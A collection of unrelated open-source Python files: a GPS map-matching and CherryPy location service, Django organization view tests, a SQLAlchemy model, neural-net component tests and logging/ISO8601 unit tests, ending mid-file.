self.add_match(time, id, matched_x, matched_y, acc, segment)
return [id, self.geo.map_nodeid_osmnodeid[segment.nodes[0].id], self.geo.map_nodeid_osmnodeid[segment.nodes[1].id], matched_x, matched_y, time]
#lon, lat = utm.utm_to_latlong(x, y, 32)
#return [id, self.geo.map_nodeid_osmnodeid[segment.nodes[0].id], self.geo.map_nodeid_osmnodeid[segment.nodes[1].id], matched_x, matched_y, time, lat, lon]
def initial_fuzzy_match(self, x, y, previous_x, previous_y, acc, candidates=None):
"""Perform initial map match based on fuzzy logic using the peach package.
@param x: x coordinate of received location
@param y: y coordinate of received location
@param previous_x: x coordinate of last received location
@param previous_y: y coordinate of last received location
@param acc: accuracy of received location
@param candidates: an iterable containing a set of predefined candidate segments (default is None)
@return: a tuple containing (identified segment, matched x, matched y)
"""
if candidates is None:
candidates = [obj for obj in self.geo.collide_circle(x, y, acc) if isinstance(obj, osm.WaySegment)]
# now calculate match possibilities for all nearby segments
results = {}
if candidates is None:
candidates = [obj for obj in self.geo.collide_circle(x, y, acc) if isinstance(obj, osm.WaySegment)]
for candidate in candidates:
closest_x, closest_y = candidate.closest_to_point(x, y)
distance = sqrt((x - closest_x)**2 + (y - closest_y)**2)
angle = self.calculate_angle((candidate.x_start, candidate.y_start), (candidate.x_end, candidate.y_end),
(previous_x, previous_y), (x, y))
angle = angle if angle < 90 else abs(angle - 180) # ignore direction of road
# the order distance, angle must be consistant with the order in the rule definition!
results[candidate] = self.c(distance, angle)
# finally select the segment with highest match propability
if results:
match = max(results.items(), key=lambda item: item[1])[0]
match_x, match_y = match.closest_to_point(x, y)
# or None, if no match was found
else:
match = None
match_x, match_y = x, y
return (match, match_x, match_y)
def subsequent_fuzzy_match(self, x, y, acc, segment, id):
"""Perform subsequent matching along the identified segment and check for transition into new segment.
@param x: x coordinate of received location
@param y: y coordinate of received location
@param acc: accuracy of received location
@param segment: the way segment the person is currently moving on
@return: a tuple containing (identified segment, matched x, matched y)
"""
# Check if person is still colliding, detect movement away from road
if segment not in [obj for obj in self.geo.collide_circle(x, y, acc) if isinstance(obj, osm.WaySegment)]:
print 'Subsequent match detected movement away from matched street segment, performing initial match again!'
self.need_init.append(id)
return None, None, None
start_point = segment.nodes[0]
end_point = segment.nodes[1]
distance_threshold = acc #XXX arbitrary value! find real one! (maybe half of maximum move without update on android)
distance_to_start = sqrt((x - start_point.x)**2 + (y - start_point.y)**2)
distance_to_end = sqrt((x - end_point.x)**2 + (y - end_point.y)**2)
angle_to_start = self.calculate_angle((start_point.x, start_point.y), (end_point.x, end_point.y),
(start_point.x, start_point.y), (x, y))
angle_to_end = self.calculate_angle((start_point.x, start_point.y), (end_point.x, end_point.y),
(x, y), (end_point.x, end_point.y))
matched_x, matched_y = segment.closest_to_point(x, y)
if angle_to_start > 90 or angle_to_end > 90 or min(distance_to_start, distance_to_end) < distance_threshold:
# person left segment, reinitiate matching with next coordinates
#TODO maybe use segments of exit-node as new candidates
# contra: matching errors are carried
self.need_init.append(id)
return (segment, matched_x, matched_y)
def calculate_angle(self, start1, end1, start2, end2):
"""Calculate the angle between two lines identified by start and end points.
@param start1: starting point of line one
@type start1: tuple (x, y)
@param end1: ending point of line one
@type end1: tuple (x, y)
@param start2: starting point of line two
@type start2: tuple (x, y)
@param end2: ending point of line two
@type end2: tuple (x, y)
@return: angle in degrees as integer
"""
vector1 = [end1[0] - start1[0], end1[1] - start1[1]]
length1 = sqrt(sum((a*b) for a, b in zip(vector1, vector1)))
vector2 = [end2[0] - start2[0], end2[1] - start2[1]]
length2 = sqrt(sum((a*b) for a, b in zip(vector2, vector2)))
dotproduct = float(sum((a*b) for a, b in zip(vector1, vector2)))
angle = degrees(acos(dotproduct / (length1 * length2)))
angle = angle - 180 if angle > 180 else angle
return angle
class ExternalDataManager(Process):
def __init__(self, sim, address, port, map_path, free_move_only, hmac_key=HMAC_KEY_DEFAULT):
Process.__init__(self, name='ExternalDataManager', sim=sim)
self.sim = sim
self.conn, child_conn = Pipe()
self.service = ConnectionService(address, port, child_conn, map_path, free_move_only, hmac_key)
self.service_process = MultiProcess(target=cherrypy.quickstart, args=(self.service, ))
#self.service_process.daemon = True
self.service_process.start()
self.running = True
self.free_move_only = free_move_only
def run(self):
for pers in self.sim.persons:
if isinstance(pers, ExternalPerson):
pers.current_coords = pers.current_coords_free_move
pers.calculate_duration = pers.calculate_duration_free_move
if self.free_move_only:
self.sim.geo.free_obj.add(pers)
while self.running:
sim = self.sim
geo = self.sim.geo
while(self.conn.poll()):
person_id, node_id_start, node_id_end, x, y, time_received = self.conn.recv()
#person_id, node_id_start, node_id_end, x, y, time_received, lat, lon = self.conn.recv()
person = sim.get_person(person_id)
if person == None:
print 'ExternalDataManager received unknown person id ', person_id, '. Discarded'
continue
if not isinstance(person, ExternalPerson):
print 'Received ID ', person_id, ' does not belong to external person. Discarded'
continue
person.last_received_coords = [x, y]
if node_id_start is not None:
if person in self.sim.geo.free_obj:
print 'Removing person with ID ', person_id, ' from free objects set!'
self.sim.geo.free_obj.remove(person)
person.new_next_node = geo.way_nodes_by_id[geo.map_osmnodeid_nodeid[node_id_end]]
person.new_last_node = geo.way_nodes_by_id[geo.map_osmnodeid_nodeid[node_id_start]]
person.need_next_target = True
else:
print 'Free move or no match found; free moving!'
self.sim.geo.free_obj.add(person)
#for m in sim.monitors:
# if isinstance(m, SocketPlayerMonitor):
# m.add_heatmap_blip(lat, lon, 3, (0.0, 0.0, 1.0, 0.4))
#lon, lat = utm.utm_to_latlong(x, y, sim.geo.zone)
#for m in sim.monitors:
# if isinstance(m, SocketPlayerMonitor):
# m.add_heatmap_blip(lat, lon, 3, (1.0, 0.0, 0.0, 0.4))
self.interrupt(person)
yield hold, self, 1
def shutdown(self):
self.service_process.terminate()
if __name__ == '__main__':
#import guppy
#map = osm.OSMModel('../../data/hannover4.osm')
#map.initialize(sim=None, enable_routing=False)
#print 'Without routing\n\t',
#print guppy.hpy().heap()
#del map
#print 'Starting routing calc'
#map = osm.OSMModel('../../data/hannover4.osm')
#map.initialize(sim=None, enable_routing=True)
#print 'With routing\n\t',
#print guppy.hpy().heap()
#manager = ExternalDataManager('192.168.1.33', 8080)
service = ConnectionService('192.168.1.33', 8080, None, '../../data/hannover2.osm', True, HMAC_KEY_DEFAULT)
cherrypy.quickstart(service)
| bhenne/MoSP | mosp/external_persons/external_data_manager.py | Python | gpl-3.0 | 18,566 |
from django.test import TestCase, Client
from organizations.models import Organization
# Create your tests here.
class ViewTests(TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_create_org(self):
c = Client()
response = c.post('/register/', {'username': 'aaaa', 'password': 'aaaa', 'email': '[email protected]'})
response = c.post('/organizations/create/', {'name': 'Organization_1', 'description': 'Description for org 1', 'openness': 'O'})
self.assertRedirects(response, '/organizations/', status_code=302, target_status_code=200, host=None, msg_prefix='', fetch_redirect_response=True)
def test_view_org(self):
c = Client()
c.post('/register/', {'username': 'aaaa', 'password': 'aaaa', 'email': '[email protected]'})
# Create organization...
c.post('/organizations/create/', {'name': 'Organization_1', 'description': 'Description for org 1', 'openness': 'O'})
# View details about this org, should redirect to dashboard
org = Organization.objects.all()[0]
response = c.get('/organizations/'+str(org.id)+'/details/')
self.assertRedirects(response, '/dashboard/', status_code=302, target_status_code=200, host=None, msg_prefix='', fetch_redirect_response=True)
print('Organization creation test passed')
def test_view_nonexistant_org(self):
c = Client()
c.post('/register/', {'username': 'aaaa', 'password': 'aaaa', 'email': '[email protected]'})
response = c.get('/organizations/'+str(7)+'/details/')
self.assertRedirects(response, '/organizations/', status_code=302, target_status_code=200, host=None, msg_prefix='', fetch_redirect_response=True)
print('Viewing non-existant organization test passed')
def test_delete_org(self):
c = Client()
c.post('/register/', {'username': 'aaaa', 'password': 'aaaa', 'email': '[email protected]'})
# Create organization...
c.post('/organizations/create/', {'name': 'Organization_1', 'description': 'Description for org 1', 'openness': 'O'})
# Delete this org, should redirect to organizations list
org = Organization.objects.all()[0]
response = c.get('/organizations/'+str(org.id)+'/delete/')
self.assertRedirects(response, '/organizations/', status_code=302, target_status_code=200, host=None, msg_prefix='', fetch_redirect_response=True)
print('Delete organization test passed')
def test_delete_nonexistant_org(self):
c = Client()
c.post('/register/', {'username': 'aaaa', 'password': 'aaaa', 'email': '[email protected]'})
# Delete nonexistant, should redirect to organizations list
response = c.get('/organizations/'+str(7)+'/delete/')
self.assertRedirects(response, '/organizations/', status_code=302, target_status_code=200, host=None, msg_prefix='', fetch_redirect_response=True)
print('Deleting nonexistant organization test passed')
def test_edit_org(self):
c = Client()
c.post('/register/', {'username': 'aaaa', 'password': 'aaaa', 'email': '[email protected]'})
# Create organization...
c.post('/organizations/create/', {'name': 'Organization_1', 'description': 'Description for org 1', 'openness': 'O'})
org = Organization.objects.all()[0]
response = c.get('/organizations/'+str(org.id)+'/edit/')
self.assertEqual(response.status_code, 200)
print('Edit organization test passed')
def test_nonexistant_edit_org(self):
c = Client()
c.post('/register/', {'username': 'aaaa', 'password': 'aaaa', 'email': '[email protected]'})
# No organizations exist, try to visit organization 7
response = c.get('/organizations/7/edit/')
self.assertRedirects(response, '/organizations/', status_code=302, target_status_code=200, host=None, msg_prefix='', fetch_redirect_response=True)
print('Edit non-existant organization test passed')
| amacnair/team-toolkit | clubbr/organizations/tests.py | Python | mit | 3,992 |
import sys
import os.path
from sqlalchemy import Column, Integer, String
# setup path so we can import our own models and controllers
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from import_tool.models.base import Base
class CodeSystem(Base):
"""
CodeSystems class that keeps track of information about a
particular ods file update. This class uses SQLAlchemy as an ORM
"""
__tablename__ = 'codesystems'
ref = Column(Integer, primary_key=True)
id = Column(String(10), index=True)
name = Column(String(50))
displayname = Column(String(200))
# Returns a printable version of the objects contents
def __repr__(self):
return "<CodeSystem('%s %s %s %s'\
)>" % (
self.ref,
self.name,
self.id,
self.displayname)
| open-ods/import_tool | import_tool/models/CodeSystem.py | Python | gpl-3.0 | 844 |
#%%
import pytest
import numpy as np
from numpy.testing import assert_allclose
from natural_bm import components
import natural_bm.backend as B
#%%
def test_NeuralNetParts():
# initialize an abstract neural net part
name = 'test'
nnet = components.NeuralNetParts(name)
# add some weights to it
train_weights = [0, 1, 2]
non_train_weights = [3, 4, 5, 6]
weights = train_weights + non_train_weights
# test two ways to add weights: item and lists
nnet.trainable_weights = train_weights[0]
nnet.trainable_weights = train_weights[1:]
nnet.non_trainable_weights = non_train_weights[0]
nnet.non_trainable_weights = non_train_weights[1:]
# verify
assert name == nnet.name
assert train_weights == nnet.trainable_weights
assert non_train_weights == nnet.non_trainable_weights
assert weights == nnet.weights
#%%
def test_Synapse():
# initialize
name = 'test'
shape = (10, 100)
init_W = np.zeros(shape)
synapse = components.Synapse(name, init_W)
# verify
assert shape == synapse.shape
assert_allclose(init_W, synapse.W.eval())
assert_allclose(init_W, synapse.trainable_weights[0].eval())
#%%
def test_Layer_init():
# initialize
name = 'test'
shape = (10, )
init_b = np.zeros(shape)
W = B.variable(np.zeros((10, 10)))
up_dict = {0: W}
down_dict = {1: W}
layer = components.Layer(name, init_b, up_dict, down_dict)
# verify
assert shape[0] == layer.dim
assert_allclose(init_b, layer.b.eval())
assert_allclose(init_b, layer.trainable_weights[0].eval())
#%%
def _make_layer(up_dict, down_dict):
# initialize
name = 'test'
shape = (10, )
init_b = np.zeros(shape)
layer = components.Layer(name, init_b, up_dict, down_dict)
return layer
#%%
@pytest.mark.parametrize('direction', ['up', 'down', 'both'],
ids=['up', 'down', 'both'])
def test_Layer_direction(direction):
W = B.variable(np.zeros((10, 10)))
up_dict, down_dict = {}, {}
if direction in ['up', 'both']:
up_dict = {0: W, 1: W, 2: W}
if direction in ['down', 'both']:
down_dict = {0: W, 1: W}
layer = _make_layer(up_dict, down_dict)
assert direction == layer.direction
if direction == 'both':
assert (len(up_dict)+len(down_dict))/len(up_dict) == layer._z_up_adj
assert (len(up_dict)+len(down_dict))/len(down_dict) == layer._z_down_adj
else:
assert not hasattr(layer, '_z_up_adj')
assert not hasattr(layer, '_z_down_adj')
#%%
def test_Layer_direction_fail():
with pytest.raises(Exception) as e_info:
layer = _make_layer({}, {})
#%%
def test_Layer_input_z():
mbs = 25
pixel = 15
layer_size_list = [10, pixel, 20]
# initialize
name = 's0'
s0_shape = (layer_size_list[0], pixel)
init_W = np.zeros(s0_shape)
synapse = components.Synapse(name, init_W)
up_dict = {0: synapse.W}
name = 's2'
s2_shape = (pixel, layer_size_list[2])
init_W = np.zeros(s2_shape)
synapse = components.Synapse(name, init_W)
down_dict = {2: synapse.W}
name = 'layer1'
shape = (pixel, )
init_b = np.zeros(shape)
layer = components.Layer(name, init_b, up_dict, down_dict)
input_ls = [np.zeros((mbs, size)) for size in layer_size_list]
# tests
for direction in ['both', 'up', 'down']:
z = layer.input_z(input_ls, direction=direction)
assert_allclose(np.zeros((mbs, pixel)), z.eval())
#%% Main
if __name__ == '__main__':
pytest.main([__file__])
| alexhunterlang/natural_bm | tests/natural_bm/test_components.py | Python | mit | 3,599 |
#!/bin/env python
import sys
import os
services = os.environ['CONDRI_HAPROXY_SERVICES'].split(',')
for x in [x.split('::')[-1] for x in services]:
print x
| thefab/docker-consul-driven-haproxy | root/usr/local/bin/get_service_names.py | Python | mit | 161 |
#!/usr/bin/env python
import unittest
import os
import sys
import signal
import subprocess
import platform
import datetime
import logging
import time
import tempfile
import json
import traceback
abs_file = os.path.abspath(__file__)
abs_dir = os.path.dirname(abs_file)
sys.path.append(abs_dir + '/..')
sys.path.append(abs_dir + '/../../')
from easy_py_messaging import apiLoggerInit
from easy_py_messaging.utils import bcolors
from easy_py_messaging.utils import cycle_priority
from easy_py_messaging import logFilter
from easy_py_messaging import logConfig
from easy_py_messaging import utils
from easy_py_messaging import logCollector
from easy_py_messaging import loggingClientTask
from easy_py_messaging import listeningPort
# Name/Directory service - both client and server
from easy_py_messaging import dirSvc
from easy_py_messaging import dirClient
# Single test example:
# python -n unittest testLogging.RunTests.testNaming
def fcnName(func):
"""Decorator to print function name before running test."""
def wrapper(*func_args, **func_kwargs):
print('=== test fcn: ' + func.__name__)
return func(*func_args, **func_kwargs)
return wrapper
class RunTests(unittest.TestCase):
@fcnName
def testConfigSettings(self):
"""
Spawn the server and client loggers
in their own separate procsses.
"""
abs_path_server = os.path.abspath(logCollector.__file__)
abs_path_app = os.path.abspath(loggingClientTask.__file__)
log_filename = os.path.abspath('./logs.log')
print '***** log_filename:%s' % log_filename
# Remove existing log file
# Other tests will test for append mode.
if os.path.exists(log_filename) and os.path.isfile(log_filename):
os.remove(log_filename)
print 'starting collector'
argv_collector = ['python',
abs_path_server,
'--log-file', log_filename,
'-t']
proc_collector = subprocess.Popen(argv_collector)
print ' '.join(argv_collector)
print (bcolors.BGGREEN +
('proc_collector pid: %d' % proc_collector.pid) +
bcolors.ENDC)
argv_client = ['python',
abs_path_app, '123']
print 'starting loggingClientTask:' + ' '.join(argv_client)
proc_app = subprocess.Popen(argv_client,
stderr=subprocess.STDOUT)
print (bcolors.BGGREEN +
('proc_app pid: %d' % proc_app.pid) +
bcolors.ENDC)
# Allow some time to process.
seconds_to_sleep = 5
print '%d seconds to process subprocs' % seconds_to_sleep
time.sleep(seconds_to_sleep)
# Kill both processes: collector and log generator
os.kill(proc_app.pid, signal.SIGINT)
os.kill(proc_collector.pid, signal.SIGINT)
# Set the log level to log everything == NOTSET
logging.basicConfig(level=logging.NOTSET)
# Now read the log file and make sure expected logs exist.
# The messages from logginClientTask.main() get logged.
log_fh = open(log_filename, 'r')
log_lines = log_fh.read()
# Junk messages. The output logs will be inspected for
# the presense of these messages.
warning_msg = 'msg=Warning,a=n,stuff=yuck,floor=ceiling'
error_msg = 'status=3,warn=continue,babble=yes,reason=testing'
debug_msg = 'msg=debug,details=yes'
critical_msg = 'msg=critical,reason=meltdown'
info_msg = 'status=1,msg=info,reason=nothing important'
# FIXME TODO - make this a real unit test!
msgs = [warning_msg,
error_msg,
debug_msg,
critical_msg,
info_msg,
]
""" TODO FIXME - get a real unit test!
for msg in msgs:
print 'Testing:' + msg
self.failUnless(msg in log_lines)
"""
@fcnName
def gen_happy_path(sep_char=utils.PAYLOAD_CONNECTOR,
key_val_sep=utils.KEY_VALUE_SEPARATOR):
"""
WARNING: DO NOT LIGHTLY CHANGE THESE TEST LOGS! Unit test uses these!
Generate happy path data with payload separator
and key/value separator chars.
"""
testData = ''
testData += '2016-03-10T11:00:39.697\tDEBUG\ta=b&temp=34.5&item=Good Stuff\n'
testData += '2016-03-10T11:00:39.697\tCMD\ta=b&temp=34.5&item=Good Stuff\n'
testData += '2016-03-10T11:01:39.697\tWARNING\ta=b&temp=74.5&item=cool\n'
testData += '2016-03-10T11:01:39.697\tERROR\ta=blah&temp=999&item=cool\n'
testData += '2016-03-10T11:02:39.697\tDEBUG\ta=b&temp=82.5&item=funny\n'
testData += '2016-03-10T11:03:39.697\tCRITICAL\ta=b&temp=99.34.5&item=Stupid Stuff'
testData = testData.replace('=', key_val_sep)
testData = testData.replace('&', sep_char)
return testData
@fcnName
def gen_missing_data(sep_char=utils.PAYLOAD_CONNECTOR,
key_val_sep=utils.KEY_VALUE_SEPARATOR):
"""
WARNING: DO NOT LIGHTLY CHANGE THESE TEST LOGS! Unit test uses these!
Generate data with some emtpy values
and key/value separator chars.
"""
testData = ''
# Good line
testData += '2016-03-10T11:00:39.697\tDEBUG\ta=b&temp=&item=Good Stuff\n'
# Doubled &&
testData += '2016-03-10T11:01:39.697\tWARNING\ta=b&&item=cool\n'
# key=value=value problem(?)
testData += '2016-03-10T11:02:39.697\tDEBUG\ta=b=c&temp=82.5&item=funny\n'
testData += '2016-03-10T11:03:39.697\tCRITICAL\ta=&temp=99.34.5&item=Stupid Stuff\n'
testData += '2016-03-10T11:02:39.697\tCMD\ta=b=c&temp=82.5&item=funny\n'
# & at end of line
testData += '2016-03-10T11:03:39.697\tCRITICAL\t=b&temp=99.34.5&item=Stupid Stuff&\n'
# duplicated keyword "temp"
testData += '2016-03-10T11:03:39.697\tCRITICAL\ta=b&temp=99.34.5&temp=999.999&item=Stupid Stuff&\n'
testData = testData.replace('=', key_val_sep)
testData = testData.replace('&', sep_char)
return testData
@fcnName
def gen_mixed_data(sep_char=utils.PAYLOAD_CONNECTOR,
key_val_sep=utils.KEY_VALUE_SEPARATOR):
"""
WARNING: DO NOT LIGHTLY CHANGE THESE TEST LOGS! Unit test uses these!
Even in our simple Raspberry Pi hydroponic system,
a bit of thought placed into logging concepts
will absolutely serve us well. Just logging
for logging sakes does not provide an incentive
to log. Having these logs provide a usable history
and alarm system incentivises our logging structure.
Think of logging as an integral part of our SCADA system.
SCADA = Supervisory Control and Data Acquisition.
SCADA gets used in remote monitoring and control
systems that operates with coded signals
over communications channels. <a href="https://en.wikipedia.org/wiki/SCADA">
Wikipedia: SCADA</a>
Some logs that an elementary SCADA system could generate.
The model is, once again, a hydroponics system. The
hydroponics system has 2 Raspberry Pis controlling various
devices and this logs to a desktop. The desktop may
send control commands. Various logs from both systems
get sent to the logger to monitor and track events
in these systems.
Assume "hydro1" and "hydro2" are systems in a remote
hydroponics garden with various measurement
instrumentations. This remote system logs to a
desktop inside the home.
Commands the remote uses to start pumps and switchs
get logged as well. This used "cmd=true&pump1=ON&host=hydro1"
meaning this is a command that turns pump1 on and
the host is hydro1.
Generate data that would look like more ordinary
data. This includes:
A named switch changing values ON/OFF.
An instrument reporting temperature reading.
A water level indicator reading too low or to high.
A moisture level too low has triggered.
A periodic report of temperature
and key/value separator chars.
Notice the keywords:
--------------------
device = Device name
state = Value for descrete devices: ON, OFF, UNKNOWN
temp = Temperature reading for analog temperature
host = Which system sent this data
cmd=req = A command request was sent. host=system performing req
cmd=req&tag=xyz...&host=central
cmd=rep = A command reply indicates acknowledgement. host=sys performing command.
A reply sends the tag of the command. Optionally the entire
original command may populate the command.
cmd=rep&tag=xyz&host=hygro1
Devices in this example:
pump01 = A water pump to maintain proper levels.
water01 = A flotation switch that detects water levels too high or too low.
tempIN, tempOUT = analog temperature measurements.
All analog and discrete devices may send "UNKNOWN" as a connection could
have dropped, power lost, wiring problems, ...
"""
testData = ''
# A periodic reading of water and temperature from several instruments
testData += '2016-03-14T08:00:00.000\tINFO\tdevice=water01&state=OFF&host=hydro1\n'
testData += '2016-03-14T08:00:00.000\tINFO\tdevice=tempIN&temp=72.3&host=hydro1\n'
testData += '2016-03-14T08:00:00.000\tINFO\tdevice=tempOUT&temp=69.2&host=hydro1\n'
# Water level has gone too low
testData += '2016-03-14T08:00:07.325\tERROR\tdevice=water01&state=LOW&host=hydro1\n'
# Pump started to raise water level. A command was sent
# pump01 request to start.
testData += '2016-03-14T08:00:09.876\tINFO\tcmd=req&tag=xyz=pump01&state=ON&host=hydro1\n'
# Command started, remote sends reply. Note use of "tag"
testData += '2016-03-14T08:00:09.876\tINFO\tcmd=rep&tag=xyz&host=hydro1\n'
# Water level back to normal and turn pump1 off.
testData += '2016-03-14T08:05:05.325\tINFO\tdevice=water01&state=OK&host=hydro1\n'
# Pump turns off
testData += '2016-03-14T08:05:15.876\tINFO\tcmd=req&tag=abc&pump01=OFF&host=hydro1\n'
# Pump starting to off state.
testData += '2016-03-14T08:05:15.876\tINFO\tcmd=rep&tag=abc&host=hydro1\n'
# Periodic temperature readings
# More likely would be one reading per device.
testData += '2016-03-14T08:10:00.000\tINFO\tdevice=water01&state=OK&pump01=OFF&temp04=70.1&temp03=69.0&host=hydro1\n'
testData += '2016-03-14T08:10:00.000\tINFO\tdevice=pump01&device=temp04&temp=70.1&temp03=69.0&host=hydro1\n'
testData += '2016-03-14T08:10:00.000\tINFO\tdevice=pump01&device=temp03&temp=69.0&host=hydro1\n'
#
# BROKEN - FIXME - need one device per request! "circulation" is a macro
# Normal circulation started on command. Notice multiple devices turned on.
testData += '2016-03-14T08:12:14.734\tINFO\tcmd=req&tag=circulation&water01=OK&pump01=ON&circulation=ON&host=hydro1\n'
# Circulation started
testData += '2016-03-14T08:12:14.734\tINFO\tcmd=rep&tag=circulation&&host=hydro1\n'
# Normal circulation finished. Simply status indicating state of devices.
testData += '2016-03-14T08:22:14.739\tINFO\twater01=OK&pump01=OFF&circulation=OFF&host=hydro1\n'
testData = testData.replace('=', key_val_sep)
testData = testData.replace('&', sep_char)
return testData
class TestLogs2CSV(unittest.TestCase):
# python -m unittest testLogging.TestLogs2CSV
@fcnName
def testHappyPath_1(self):
print 'testHappyPath'
testData = gen_happy_path()
lines = testData.split('\n')
# Check the keyword header line in CSV
try:
csv = logFilter.LogFilterCSV({})
except Exception as err:
sys.stderr.write('Invalid configuration file:%s\n' % err)
return 1
csv.parse_log_entry(lines[0])
print csv.log_keys() # Sorted keys matching data
self.failUnless('date' in csv.log_dict)
self.failUnless('level' in csv.log_dict)
self.failUnless(csv.log_dict['level'] == 'DEBUG')
self.failUnless('a' in csv.log_dict)
self.failUnless(csv.log_dict['a'] == 'b')
self.failUnless('item' in csv.log_dict)
self.failUnless(csv.log_dict['item'] == 'Good Stuff')
@fcnName
def testHappyPath_Warning(self):
print 'testHappyPath_Warning'
testData = gen_happy_path()
lines = testData.split('\n')
# Check the keyword header line in CSV
try:
csv = logFilter.LogFilterCSV({})
except Exception as err:
sys.stderr.write('Invalid configuration file:%s\n' % err)
return 1
log_dict = csv.parse_log_entry(lines[1])
self.failUnless('date' in log_dict)
self.failUnless('level' in log_dict)
self.failUnless(log_dict['level'] == 'CMD')
self.failUnless('a' in log_dict)
self.failUnless(log_dict['a'] == 'b')
self.failUnless('item' in log_dict)
self.failUnless(log_dict['item'] == 'Good Stuff')
@fcnName
def testMissingData(self):
print 'testMissingData'
testData = gen_missing_data()
lines = testData.split('\n')
# Check the keyword header line in CSV
try:
lf = logFilter.LogFilterCSV({})
except Exception as err:
sys.stderr.write('Invalid configuration file:%s\n' % err)
return 1
log_dict = lf.parse_log_entry(lines[0])
self.failUnless('date' in log_dict)
self.failUnless('level' in log_dict)
self.failUnless(log_dict['level'] == 'DEBUG')
self.failUnless('a' in log_dict)
self.failUnless(log_dict['a'] == 'b')
self.failUnless('item' in log_dict)
self.failUnless(log_dict['item'] == 'Good Stuff')
@fcnName
def testMixedData(self):
print 'testMixedData'
testData = gen_mixed_data()
lines = testData.split('\n')
# select only WARNING or higher
log_filters = logFilter.LogFilters.copy() # don't zap original!
log_filters['level'] = 'WARNING'
try:
lf = logFilter.LogFilterCSV(log_filters)
except Exception as err:
sys.stderr.write('Invalid configuration file:%s\n' % err)
return 1
log_dict = lf.parse_log_entry(lines[0])
self.failUnless(log_dict is None)
log_dict = lf.parse_log_entry(lines[3])
self.failUnless(log_dict != None)
self.failUnless(log_dict['level'] == 'ERROR')
self.failUnless('date' in log_dict)
class TestISO8601(unittest.TestCase):
"""
python -m unittest testLogging.TestISO8601
Current bash date rounded to microseconds:
date +"%s.%6N"
1458149245.545454
In milliseconds:
date +%s%3N
1458149374982
Python:
import time
cur_time = int(time.time()*1000)
Ref: https://www.gnu.org/software/coreutils/manual/html_node/Examples-of-date.html
To convert a date string to the number of seconds since the start of the epoch
use the '%s" format:
date --date='1970-01-01 00:02:00 +0000' +%s
120
If you do not specify time zone information in the date string, date uses your
computer's idea of the time zone:
# local time zone used
date --date='1970-01-01 00:02:00' +%s
18120
Also the --utc (-u) option:
date --date='2000-01-01 UTC' +%s
946684800
To convert such an unwieldy number of seconds back to a more readable form, use
a command like this:
date -d @946684800 +"%F %T %z"
1999-12-31 19:00:00 -0500
Often it is better to output UTC-relative date and time:
date -u -d '1970-01-01 946684800 seconds' +"%Y-%m-%d %T %z"
2000-01-01 00:00:00 +0000
"""
@fcnName
def testUnixToISO8601_0(self):
""" From unix time to external local ISO8601 """
# date --date='2016-03-14T08:00:09.123456' +%s.%6N
# Generally obtain from time.time()
date_now = 1457967609.123456
date_time_now = datetime.datetime.fromtimestamp(date_now)
print 'date_time_now:%s' % str(date_time_now)
self.failUnless(str(date_time_now) == '2016-03-14 08:00:09.123456')
fmt = '%Y-%m-%dT%H:%M:%S.%f'
now_str = date_time_now.strftime(fmt)
print 'now_str:%s' % now_str
self.failUnless(str(now_str) == '2016-03-14T08:00:09.123456')
now_tuple = datetime.datetime.strptime(now_str, fmt)
print 'now_tuple:%s' % str(now_tuple)
self.failUnless(str(now_tuple) == '2016-03-14 08:00:09.123456')
print 'microsecond:%s' % now_tuple.microsecond
seconds = time.mktime(now_tuple.timetuple())
print 'seconds:%s' % str(seconds)
sec_epoch = time.mktime(now_tuple.timetuple()) + 1.0e-6*now_tuple.microsecond
sec_epoch = seconds + now_tuple.microsecond/1000000.0
print 'sec_epoch: %s' % sec_epoch
# date -d @1457967609.123456 +%FT%T.%N
# 2016-03-14T08:00:09.123456000
self.failUnless(sec_epoch == date_now)
@fcnName
def testUnixToISO8601_1(self):
"""
From unix time to external local ISO8601
User needs to convert internal unix floating point
seconds into an ISO 8601 string.
"""
date_str = '2016-03-14T08:00:09.123456'
# date --date='2016-03-14T08:00:09.123456' +%s.%6N
# Generally obtain from time.time()
secsNow = 1457967609.123456 # Unix time in seconds
# Convert to ISO 8601
secStr = utils.seconds_to_ISO8601(secsNow)
self.failUnless(date_str == secStr)
@fcnName
def testTimeNowISO8601(self):
"""
Can not really tell now() in a convenient testable manner.
What to do? All this routine does in increase coverage.
"""
secs_str = utils.time_now_ISO8601()
print 'time_now_ISO8601=' + secs_str
@fcnName
def testISO8601ToSecs(self):
"""
From ISO 8601 to unix seconds.
App reads DATE field from log file and converts to
internal unix floating point seconds in local time.
"""
date_str = '2016-03-14T08:00:09.123456'
# date --date='2016-03-14T08:00:09.123456' +%s.%6N
# Generally obtain from time.time()
secsNow = 1457967609.123456 # Unix time in seconds
secs = utils.ISO8601_to_seconds(date_str)
self.failUnless(secs == secsNow)
@fcnName
def testISO8601ToSecsErrors(self):
"""
From ISO 8601 to unix seconds with errors in input
App reads DATE field from log file and converts to
internal unix floating point seconds in local time.
"""
date_str = '2016-03-14T:11:00:09.123456'
# date --date='2016-03-14T08:00:09.123456' +%s.%6N
secs = utils.ISO8601_to_seconds(date_str)
self.failUnless(secs is None)
@fcnName
def testTimeNow(self):
"""
Simple test of time now.
"""
the_time = utils.time_now()
# Ignore the value as "the_time" always changes.
self.failUnless(type(the_time) == type(1.0))
@fcnName
def testTimeNowISO8601(self):
"""
Simple test of the time now in ISO8601 format
"""
iso = utils.time_now_ISO8601()
self.failUnless(type(iso) == type(''))
@fcnName
def testISOError(self):
"""
Test error conditions.
Pass in bogus ISO8601 formats. Should get None seconds
"""
seconds = utils.ISO8601_to_seconds('2016-XX-01T00:00:00.000')
self.failUnless(seconds is None)
seconds = utils.ISO8601_to_seconds('2016-99-01T00:00:00.000')
self.failUnless(seconds is None)
seconds = utils.ISO8601_to_seconds('2016-03-01T30:00:00.000')
self.failUnless(seconds is None)
seconds = utils.ISO8601_to_seconds('2016-03-01X00:00:00.000')
self.failUnless(seconds is None)
seconds = utils.ISO8601_to_seconds('2016-03-01T00:61:00.000')
self.failUnless(seconds is None)
seconds = utils.ISO8601_to_seconds('2016-03-01T00:00:00.abc')
self.failUnless(seconds is None)
seconds = utils.ISO8601_to_seconds('2016-03-01T00:00:00')
self.failUnless(seconds is None)
seconds = utils.ISO8601_to_seconds('2016-03-01T00:00')
self.failUnless(seconds is None)
# No leading 0's - OK
seconds = utils.ISO8601_to_seconds('2016-3-01T00:00:00.000')
self.failUnless(seconds != None)
# No leading 0's - OK
seconds = utils.ISO8601_to_seconds('2016-3-1T0:0:0.0')
self.failUnless(seconds != None)
class TestLogs2JSON(unittest.TestCase):
# python -m unittest testLogging.TestLogs2JSON
@fcnName
def testLogs2JSON_HappyPath(self):
